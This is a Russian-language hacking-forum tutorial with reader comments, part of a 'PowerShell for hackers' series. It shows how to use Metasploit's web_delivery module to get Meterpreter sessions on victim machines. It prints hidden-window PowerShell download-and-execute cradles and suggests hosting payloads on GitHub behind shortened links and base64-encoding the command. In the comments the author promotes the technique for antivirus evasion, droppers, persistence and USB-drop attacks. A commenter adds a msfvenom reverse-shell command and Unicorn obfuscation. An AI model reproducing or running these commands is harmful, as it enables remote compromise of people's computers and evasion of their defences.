• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

Часть 4
Предыдущая часть
Следующая часть
Все части

1461015_242885682542169_1621012423_n.jpg


Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я стараюсь в своих статьях придерживаться связки PowerShell+Metasploit. И в этой статье я также буду демонстрировать технику доставки полезной нагрузки для получение метерпретер сессии в метасплоите. И так давайте начнем.

Прежде чем начну,хочу заметить что мой скрипт Power_Meter,который я использовал в прошлых статьях так же работает по принципу веб деливери.

Для начала давайте посмотрим как это работает:
Запустим метасплоит,поищим по ключевому слову web_delivery

01.PNG


Посмотрим описания эксплойта:

02.PNG


Из описания узнаем для себя базовые опции,кем написан был еще в 2013 году и сплойт этот работает на платформах где есть или Python или PHP или PowerShell, ну мы же конечно посмотрим его на примере с PowerShell. Так же видим в описании что при запуске стартует простенький вебсервер который хранит на себе полезную нагрузку и генерирует команду для запуска этой полезной нагрузки в зависимости от языка программирования которые мы выберем командой set target
Ну что же , давайте зададим необходимые параметры и запустим наш эксплоит.

03.PNG


04.PNG


Как видим у нас поднялся простенький веб сервер с полезной нагрузкой по адресу
и выдал нам на вывод команду для подгрузки этой полезной нагрузки
powershell.exe -nop -w hidden -c $h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]:: DefaultCredentials;IEX $h.downloadstring('

Что же,для демонстрации просто запустим данную команду на стороне жертвы:

05.PNG


06.PNG


Как видим все тривиально просто) Команда подгрузила полезную нагрузку из удаленного веб сервера)
Круто)
Но зачем нам каждый раз поднимать веб сервер для хранение полезной нагрузки?
Давайте положим полезную нагрузку где то на гитхабе.
Сперва сначала давайте скачаем содержимое нагрузки:

07.PNG


08.PNG


Скопируем содержимое полезной нагрузки и разместим где то на гитхабе и сократим ссылку через :

09.PNG


10.PNG


Затем,мы уже поняли как работает принцип веб деливер используем следующую команду для компрометации жертвы:
powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring(' link removed

-w hidden (window hidden ) -- скрыть окно запуска
-NoP (No Profile) -- не использовать профиль PowerShell

IEX (New-Object Net.WebClient).downloadstring(' link removed -- загрузить и запустить в памяти контент который находится по ссылке
11.PNG
12.PNG


Как видим команда намного короче а результат тот же
Для удобства и инжекта в какое то ПО можно перегнать в base64 формат нашу команду)

14.PNG


15.PNG


16.PNG


Как видим результат тот же)
В общем на этом пока все) Надеюсь смысл техники доставки полезной нагрузки более менее понятен)

Если возникнут трудности - задавайте вопросы в комментариях - постараюсь ответить)


Всем спасибо) Если понравилась статья - жмакни лайк )

Предыдущая часть
Следующая часть
Все части
 
Последнее редактирование:

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
А если скомпилить файл hack поднять apache и положить в /var/www/apache2/ разве не тоже самое получится? Спасибо.
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
Ну попробуй,потом скажешь ;)
Ты не понял вопрос. В чем принципиальное отличие этого подхода от того, что я положу тот же файлик hack на сервер и дам скачать пользователю? В конечном итоге все равно все сводится к тому, что пользователять должен скачать запустить файл. Сам же он не будет у себя писать powershell -скрипт. Проще говоря, что этот подход дает?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Ты не понял вопрос. В чем принципиальное отличие этого подхода от того, что я положу тот же файлик hack на сервер и дам скачать пользователю? В конечном итоге все равно все сводится к тому, что пользователять должен скачать запустить файл. Сам же он не будет у себя писать powershell -скрипт. Проще говоря, что этот подход дает?
В первую очередь это техника доставки пейлоада ,которую я хотел раскрыть для читателей,на ней построенны много дроперов(например все мы прекрасно помним когда при установки ПО ,после установки у нас устанавливаеться еще куча ненужного гомна,типа браузер Амиго и т.д)
К тому же:
Бинарный файл,длл,и впрочем любой файл локальный - как минимум нужно упрятать от проверки различными АнтиВирусами(АВ),а эта техника позволит просто добавить строчку в какой то билд для получение метерпретера.
Еще , больше всего актуальность этой техники непосредственно для постексплуатации или закрепление в системе,например если у нас простенький шелл и нам нужно расширить функционал до метерпретора,мимикатца,повершел империи фреймворка...
В дальнейших постах я планирую показать как с помощью павершел запустить любой бинарый файл в памяти с пмощью этой техники и как можно обходить ав.
Так же одна строчка кода отлично подружется с RubberDucker и почти незаметно выполнится как только флешка вставится в разьем.
Еще пару постов и планирую переходить на PowerShell Empire Framework - знакомить читателей с его возможностями и функционалом. Но перед знакомством с фреймворком по моему мнению нужны такие посты ознакомительные как этот.
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
В первую очередь это техника доставки пейлоада ,которую я хотел раскрыть для читателей,на ней построенны много дроперов(например все мы прекрасно помним когда при установки ПО ,после установки у нас устанавливаеться еще куча ненужного гомна,типа браузер Амиго и т.д)
К тому же:
Бинарный файл,длл,и впрочем любой файл локальный - как минимум нужно упрятать от проверки различными АнтиВирусами(АВ),а эта техника позволит просто добавить строчку в какой то билд для получение метерпретера.
Еще , больше всего актуальность этой техники непосредственно для постексплуатации или закрепление в системе,например если у нас простенький шелл и нам нужно расширить функционал до метерпретора,мимикатца,повершел империи фреймворка...
В дальнейших постах я планирую показать как с помощью павершел запустить любой бинарый файл в памяти с пмощью этой техники и как можно обходить ав.
Так же одна строчка кода отлично подружется с RubberDucker и почти незаметно выполнится как только флешка вставится в разьем.
Еще пару постов и планирую переходить на PowerShell Empire Framework - знакомить читателей с его возможностями и функционалом. Но перед знакомством с фреймворком по моему мнению нужны такие посты ознакомительные как этот.
Неее, про мощь самого powershell'а и на сколько он крутой я знаю и полностью согласен с тем, что это сильное и мощное оружие, которое творить может великие дела. Я говорю чисто о способе доставки, то есть по факту если я понял верно сплоит генерит строку powershell с которой мы потом можем делать че угодно но сие на нашей совести уже?
 
  • Нравится
Реакции: <~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Неее, про мощь самого powershell'а и на сколько он крутой я знаю и полностью согласен с тем, что это сильное и мощное оружие, которое творить может великие дела. Я говорю чисто о способе доставки, то есть по факту если я понял верно сплоит генерит строку powershell с которой мы потом можем делать че угодно но сие на нашей совести уже?
Ну я просто показал как это работает на примере эксплойта из метасплойта. Суть вся в том что мы не скачиваем вредоносную полезную нагрузку локально а подгружаем удаленно в оперативную память. Это часто использутся для обхода АВ когда сигнатуры самого билда сильно детектятся АнтиВирусами.
Техника эта реализуется легко и другмим ЯП,просто серия постов посвященна именно павершел с точки зрения ИБ )
 
  • Нравится
Реакции: arm_n и Mixa

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
Ну я просто показал как это работает на примере эксплойта из метасплойта. Суть вся в том что мы не скачиваем вредоносную полезную нагрузку локально а подгружаем удаленно в оперативную память. Это часто использутся для обхода АВ когда сигнатуры самого билда сильно детектятся АнтиВирусами.
Техника эта реализуется легко и другмим ЯП,просто серия постов посвященна именно павершел с точки зрения ИБ )
Всё, до меня дошло, спасибо.
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Не работает на Windows 10. Появляется надпись:
[*] 192.168.0.19 web_delivery - Delivering Payload
И дальше ничего не происходит. Кто знает в чем дело? Может из за win 10?
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Ч

Тестировал на вин10.Все хорошо работает.
Странно, на двух машинах с win 10 пробовал, не катит. Сегодня поменю еще kali, может сним проблема, я ставил metasploit pro.
И еще, сюдя по описанию он работает с x64, верно?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Странно, на двух машинах с win 10 пробовал, не катит. Сегодня поменю еще kali, может сним проблема, я ставил metasploit pro.
И еще, сюдя по описанию он работает с x64, верно?
Суть техники в том,что сам код для поднятие сессии метерпретора размещен на удаленном ресурсе,а мы с машины жертвы его подгружаем и выполняем.
Техника работает на машинах с Windows ОС где есть установленный PowrrShell. У меня все работало как 32-х так и на 64-х битной Windows 10
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Суть техники в том,что сам код для поднятие сессии метерпретора размещен на удаленном ресурсе,а мы с машины жертвы его подгружаем и выполняем.
Техника работает на машинах с Windows ОС где есть установленный PowrrShell. У меня все работало как 32-х так и на 64-х битной Windows 10
Посмотрел отчет Microsoft Essential, а там:
4531568.png

Как только его октлючил все заработало.
 
Последнее редактирование:

~localhost

Green Team
30.10.2017
230
49
BIT
18
Привет столкнулся с такой проблемой при использования данного экплойта,
Подскажите что делаю не так
Снимок экрана от 2018-06-11 10-45-16.png
предпологаю что ошибка кроется в web server, пытался скачать через браузер эту нагрузку, и моментально после вводу url в стороку, выскакивает данная ошибка, в браузере не чего не скачалось.
 
Последнее редактирование:

sosiskapi

Green Team
28.12.2016
57
22
BIT
0
Сперва сначала давайте скачаем содержимое нагрузки:
Подскажите как сгенерировать нагрузку, без поднятия сайта, так чтобы ее не пришлось скачивать, как в примере.
Пробовал так:
msf payload(windows/powershell_reverse_tcp) > generate
получил такое
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .......и т.д.
Это же не то?
И еще вопрос как сгенерировать powershell meterpreter В msfvenome?
 
Последнее редактирование:

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Подскажите как сгенерировать нагрузку, без поднятия сайта, так чтобы ее не пришлось скачивать, как в примере.
Пробовал так:
msf payload(windows/powershell_reverse_tcp) > generate
получил такое
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .......и т.д.
Это же не то?
И еще вопрос как сгенерировать powershell meterpreter В msfvenome?
С msfvenom можно так сгенерировать:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=443 -f psh-cmd -o hack.ps1
потом размещаете этот файл где то на сервере если нужен Web-Delivery.
Но для генерации полезной нагрузки, лучше пользоваться Unicorn-ом, он делает неплохую обфускацию.
 
  • Нравится
Реакции: sosiskapi
L

luzercod

фильтр сайта не даст доставить нагрузку
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!